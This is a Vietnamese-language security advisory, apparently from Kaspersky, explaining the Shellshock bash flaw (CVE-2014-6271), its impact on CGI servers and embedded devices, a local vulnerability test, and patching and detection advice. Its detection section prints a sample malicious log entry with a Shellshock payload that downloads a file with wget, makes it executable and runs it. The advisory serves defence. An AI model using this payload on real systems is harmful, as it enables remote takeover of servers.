17/09/2018, 20:13

Những điều cần biết về lỗ hổng nguy hiểm trong “bash” (CVE-2014-6271)

Lỗ hổng bảo mật “bash” (CVE-2014-6271) là gì? Lỗ hổng bảo mật “bash” được mô tả với mã CVE-2014-6271 là một lỗ hổng vô cùng nguy hiểm do có tầm ảnh hưởng lớn và dễ dàng khai thác. Tin tặc có thể dễ dàng thực hiện các lệnh của hệ thống cùng quyền của dịch vụ bị khai thác. ...

Lỗ hổng bảo mật “bash” (CVE-2014-6271) là gì?

Lỗ hổng bảo mật “bash” được mô tả với mã CVE-2014-6271 là một lỗ hổng vô cùng nguy hiểm do có tầm ảnh hưởng lớn và dễ dàng khai thác. Tin tặc có thể dễ dàng thực hiện các lệnh của hệ thống cùng quyền của dịch vụ bị khai thác.

Trong hầu hết các vụ bị khai thác bởi lỗ hổng trên Internet hiện nay, tin tặc điều khiển các cuộc tấn công vào máy chủ trang web từ xa lưu trữ CGI script được viết trong bash.

Tại thời điểm của bài viết này, lỗ hổng đã được sử dụng cho những mục đích lừa đảo – lây nhiễm trên các máy chủ dễ bị tổn thương với mã độc và trong các cuộc tấn công của tin tặc. Các nhà nghiên cứu liên tục thu thập mẫu mới và những dấu hiệu bị lây nhiễm thông qua lỗ hổng này; thông tin cụ thể về loại này sẽ được công bố sớm.

Điều quan trọng cần hiểu là lỗ hổng này không bị rằng buộc bởi một dịch vụ cụ thể nào cả, ví dụ Apache hoặc nginx. Thay vào đó, nó nằm trong trình thông dịch bash shell, cho phép tin tặc thêm các lệnh hệ thống vào các biến môi trường mà bash sử dụng.

Lỗ hổng “bash” hoạt động như thế nào?

Chúng tôi lấy ví dụ tương tự như chúng ta đã được thấy trong các khuyến cào và các code POC khai thác được đăng tải nhằm giải thích cách thức hoạt động của lỗ hổng. Khi bạn có một CGI script trên máy chủ web, scritp này sẽ tự động đọc các biến môi trường nhất định, ví dụ như địa chỉ IP của bạn, phiên bản trình duyệt web và thông tin về local system.

Nhưng hãy tưởng tượng rằng bạn không chỉ vượt qua được thông tin bình thường của hệ thống với CGI script, bạn còn có thể dùng để chạy các lệnh ở cấp độ cao hơn của hệ thống. Điều đó có nghĩa là không cần bất cứ thông tin xác thực nào trên webserver, chỉ cần truy cập vào CGI script bạn có thể đọc được các biến môi trường này và những biến môi trường đó bao gồm cả những chuỗi thông tin có thể bị khai thác và thực thi lệnh mà bạn chỉ định trên máy chủ.

Điều khiến lỗ hổng trở nên độc đáo và nguy hiểm?

Lỗ hổng trở nên nguy hiểm bởi nó rất dễ dàng khai thác – nhất là khi số lượng đối tượng đang tồn tại lỗ hổng này là rất nhiều. Nó không chỉ ảnh hưởng đến máy chủ web mà còn ảnh hưởng đến bất kì phần mềm nào sử dụng thông dịch bash và đọc các dữ liệu của bạn.

Các nhà nghiên cứu vẫn đang cố gắng tìm hiểu xem các trình thông dịch như PHP, JSP, Python hay Perl có bị ảnh hưởng hay không. Dựa vào code được viết, đôi khi một trình thông dịch lại sử dụng bash để chạy những hàm nhất đinh; và trong trường hợp này rất có thể các trình thông dịch khác cũng bị lỗ hổng CVE-2014-6271.

Tác động của nó là rất lớn vì rất nhiều thiết bị nhúng có sử dụng CGI script – ví dụ như router, đồ gia dụng, wireless access point. Trong nhiều trường hợp rất khó để vá lỗ hổng này.

Mức độ phổ biến của lỗ hổng?

Rất khó để đưa ra được mức độ lan rộng của nó nhưng theo các chuyên gia từ Kaspersky cho biết ngay sau khi lỗ hổng được công bố, rất nhiều người đã phát triển công cụ khai thác và lây nhiễm các virus liên quan – cả hacker mũ đen và hacker mũ trắng đều tìm kiếm trên Internet những máy chủ dễ bị tổn thương bởi lỗ hổng. Có rất nhiều công cụ khai thác đang được phát triển nhắm đến local file và network daemon. Cũng có nhiều cuộc thảo luận liên quan đến OpenSSH và DHCP-Clines bị tổn thương trước kiểu tấn công này.

Cách kiểm tra hệ thống/trang web có bị ảnh hưởng hay không?

Cách đơn giản nhất để kiểm tra hệ thống của bạn có bị tổn thương hay không là mở một bash-shell trên hệ thống và thực thi lệnh sau

"env x='() { :;}; echo vulnerable' bash  -c "echo this is a test"

Nếu shell trả về chuỗi “vulnerable” thì bạn nên cập nhật lại hệ thống của mình. Ngoài ra còn có các công cụ khác để kiểm tra lỗ hổng này bằng cách thử khai thác vào hệ thống của bạn.

Lời khuyên về việc vá lỗ hổng ?

Việc đầu tiên mà bạn cần làm là cập nhật phiên bản bash của bạn. Các bản phân phối khác nhau từ Linux được cung cấp các bản vá lỗi cho lỗ hổng này nhưng không phải tất cả bản vá đều được chứng minh là thực sự hiệu quả, đó chỉ là bước đầu tiên cần làm.

Nếu bạn sử dụng bất kì IDS/IPS nào, chúng tôi khuyên bạn nên add/load một signature cho nó. Rất nhiều public rule đã được đăng tải. Ngoài ra xem xét lại cấu hình máy chủ web của bạn. Nếu có bất kì CGI script nào thì hãy vô hiệu hóa chúng.

Đây có phải là mối đe dọa đến các ngân hàng trực tuyến?

Lỗ hổng này được khai thác nhắm đến mục tiêu là các máy chủ lưu trữ trên Internet. Ngay cả một số workstation chạy Linux và OSX cũng bị ảnh hưởng, nhưng tin tặc sẽ cần phải tìm ra phương thức tấn công mới có thể khai thác từ xa trên máy tính của bạn.

Lỗ hổng này không nhắm đến mục tiêu cá nhân mà là máy chủ trên Internet. Nhưng cũng có nghĩa là nếu trang web của công ty thương mại điện tử hay ngân hàng mà bạn sử dụng bị tấn công thì về mặt lí thuyết thông tin cá nhân của bạn cũng sẽ bị xâm hại. Vào thời điểm của bài viết này, khó có thể nói được chính xác nền tảng nào sẽ bị tổn thương và trở thành mục tiêu tấn công, nhưng chúng tôi khuyên bạn không nên kích hoạt thẻ tín dụng hay chia sẻ những thông tin nhạy cảm trong những ngày sắp tới, đến khi các nhà nghiên cứu bảo mật có thể tìm ra nhiều thông tin hơn về tình huống này.

Có thể phát hiện được nếu ai đó đang khai thác lỗ hổng này không?

Chúng tôi khuyến cáo bạn nên xem xét lại HTTP log và kiểm tra xem bất kì thứ gì khả nghi. Ví dụ về một mẫu mã độc

192.168.1.1 - - [25/Sep/2014:14:00:00 +0000] "GET / HTTP/1.0"  400 349 "() { :; }; wget -O /tmp/besh http://192.168.1.1/filename; chmod 777  /tmp/besh; /tmp/besh;"

Ngoài ra còn một số bản vá cho bash có thể ghi lại dòng lệnh được kiểm duyệt thông qua trình thông dịch bash. Đó là một cách hữu hiệu để tìm ra ai đó đang khai thác thiết bị của bạn. Nó không thể ngăn chặn được tin tặc nhưng có thể ghi chép lại hoạt động của chúng trên hệ thống.

Mối đe dọa này nghiêm trọng như thế nào?

Lỗ hổng này thực sự nguy hiểm, nhưng không phải mọi hệ thống đều bị tổn thương. Phải trong những điều kiện cụ thể, ví dụ cho một máy chủ đang sử dụng các dịch vụ có thể bị khai thác. Một vấn đề lớn nhất hiện nay là khi các bản vá được công khai, các nhà nghiên cứu sẽ tìm ra cách để khai thác bash, tìm ra những điều kiện khác cho phép khai thác bash v.v . Những bản vá có thể giúp ngăn chặn thực thi mã độc nhưng không thể làm gì được với một file ghi đè lên. Vì vậy có thể sẽ có một loạt các bản vá lỗi liên tục cho bash.

Đây có phải loại  Heartbleed mới?

Nó dễ dàng cho tin tặc khai thác hơn Heartbleed. Trong trường hợp của Heartbleed, tin tặc có thể ăn cắp dữ liệu từ bộ nhớ, tìm những thông tin đáng quan tâm trong đó. Ngược lại, lỗ hổng bash có thể khiến tin tặc điều khiển toàn bộ hệ thống. Do đó nó có vẻ nguy hiểm hơn Heartbleed.

Nó có thể được sử dụng trong các cuộc tấn công APT trong tương lai?

Nó có thể được dùng như một mã độc tự động để kiểm tra thiết bị tồn tại bug hay không, lây lan trên hệ thống và tấn công theo một cách nào đó.

 Kaspersky

0